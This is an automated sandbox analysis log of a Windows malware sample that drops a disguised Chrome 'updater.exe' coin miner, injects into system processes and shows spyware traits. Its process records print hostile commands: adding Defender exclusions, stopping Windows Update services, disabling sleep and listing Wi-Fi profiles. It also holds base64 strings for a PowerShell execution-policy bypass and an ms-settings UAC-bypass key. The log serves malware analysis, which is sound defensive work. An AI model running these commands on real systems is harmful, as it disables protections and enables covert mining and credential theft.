          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4012CDC NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,0_2_00000125D4012CDC
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D40121CC NtQuerySystemInformation,StrCmpNIW,0_2_00000125D40121CC
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4012A7C NtEnumerateValueKey,NtEnumerateValueKey,0_2_00000125D4012A7C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D40123F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,0_2_00000125D40123F0
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,19_2_00007FF744DD10C0
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88A2A7C NtEnumerateValueKey,NtEnumerateValueKey,24_2_000001F6C88A2A7C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC9026F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,27_2_00000261AC9026F0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC9021CC NtQuerySystemInformation,StrCmpNIW,27_2_00000261AC9021CC
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E402A7C NtEnumerateValueKey,NtEnumerateValueKey,29_2_000002311E402A7C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4012CDC: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,0_2_00000125D4012CDC
          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
          Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\jscseoeoqftm.tmp
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36CB0300_2_00000125D36CB030
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36CF2F80_2_00000125D36CF2F8
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36D16580_2_00000125D36D1658
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36CB23C0_2_00000125D36CB23C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36C20DC0_2_00000125D36C20DC
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4012CDC0_2_00000125D4012CDC
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401BE3C0_2_00000125D401BE3C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D40222580_2_00000125D4022258
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401FEF80_2_00000125D401FEF8
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401BC300_2_00000125D401BC30
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A53DCD80_2_00007FF95A53DCD8
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A53AF460_2_00007FF95A53AF46
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A53BCF20_2_00007FF95A53BCF2
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A54F9F00_2_00007FF95A54F9F0
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A53127D0_2_00007FF95A53127D
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD14E419_2_00007FF744DD14E4
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD232819_2_00007FF744DD2328
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1DB419_2_00007FF744DD1DB4
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD26E819_2_00007FF744DD26E8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF95A5351E821_2_00007FF95A5351E8
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C847B03024_2_000001F6C847B030
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C84720DC24_2_000001F6C84720DC
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C847B23C24_2_000001F6C847B23C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C848165824_2_000001F6C8481658
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C847F2F824_2_000001F6C847F2F8
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88ABC3024_2_000001F6C88ABC30
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88A2CDC24_2_000001F6C88A2CDC
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88AFEF824_2_000001F6C88AFEF8
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88ABE3C24_2_000001F6C88ABE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88B225824_2_000001F6C88B2258
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88DB03024_2_000001F6C88DB030
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88D20DC24_2_000001F6C88D20DC
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88DF2F824_2_000001F6C88DF2F8
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88DB23C24_2_000001F6C88DB23C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88E165824_2_000001F6C88E1658
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890BC3024_2_000001F6C890BC30
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C8902CDC24_2_000001F6C8902CDC
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890FEF824_2_000001F6C890FEF8
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890BE3C24_2_000001F6C890BE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C891225824_2_000001F6C8912258
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8DF2F827_2_00000261AC8DF2F8
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8E165827_2_00000261AC8E1658
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8DB03027_2_00000261AC8DB030
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8D20DC27_2_00000261AC8D20DC
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8DB23C27_2_00000261AC8DB23C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90FEF827_2_00000261AC90FEF8
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC91225827_2_00000261AC912258
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90BC3027_2_00000261AC90BC30
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC902CDC27_2_00000261AC902CDC
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90BE3C27_2_00000261AC90BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275EF2F828_2_000001F0275EF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275EB23C28_2_000001F0275EB23C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275F165828_2_000001F0275F1658
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275EB03028_2_000001F0275EB030
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275E20DC28_2_000001F0275E20DC
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761FEF828_2_000001F02761FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02762225828_2_000001F027622258
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761BE3C28_2_000001F02761BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761BC3028_2_000001F02761BC30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F027612CDC28_2_000001F027612CDC
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3DB23C29_2_000002311E3DB23C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3E165829_2_000002311E3E1658
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3DF2F829_2_000002311E3DF2F8
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3DB03029_2_000002311E3DB030
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3D20DC29_2_000002311E3D20DC
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E41225829_2_000002311E412258
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40BE3C29_2_000002311E40BE3C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40FEF829_2_000002311E40FEF8
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40BC3029_2_000002311E40BC30
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E402CDC29_2_000002311E402CDC
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E44165829_2_000002311E441658
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E43B23C29_2_000002311E43B23C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E43F2F829_2_000002311E43F2F8
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E43B03029_2_000002311E43B030
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E4320DC29_2_000002311E4320DC
          Source: jscseoeoqftm.tmp.1.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Source: updater.exe.1.drStatic PE information: Number of sections : 14 > 10
          Source: zxcvbnmasd.exe.0.drStatic PE information: Number of sections : 14 > 10
          Source: zufmUwylvo.exe, 00000000.00000000.11491251455.00000125B8E04000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.exe" vs zufmUwylvo.exe
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: zufmUwylvo.exe, DiybvPeeTbqiC.csBase64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9
          Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@72/47@3/3
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,19_2_00007FF744DD2328
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A54C3EC CreateToolhelp32Snapshot,0_2_00007FF95A54C3EC
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,19_2_00007FF744DD1AC4
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,19_2_00007FF744DD2328
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zufmUwylvo.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8548:304:WilStaging_02
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8548:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8980:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8980:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8896:120:WilError_03
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeJump to behavior
          Source: zufmUwylvo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: zufmUwylvo.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: zufmUwylvo.exeReversingLabs: Detection: 68%
          Source: unknownProcess created: C:\Users\user\Desktop\zufmUwylvo.exe "C:\Users\user\Desktop\zufmUwylvo.exe"
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
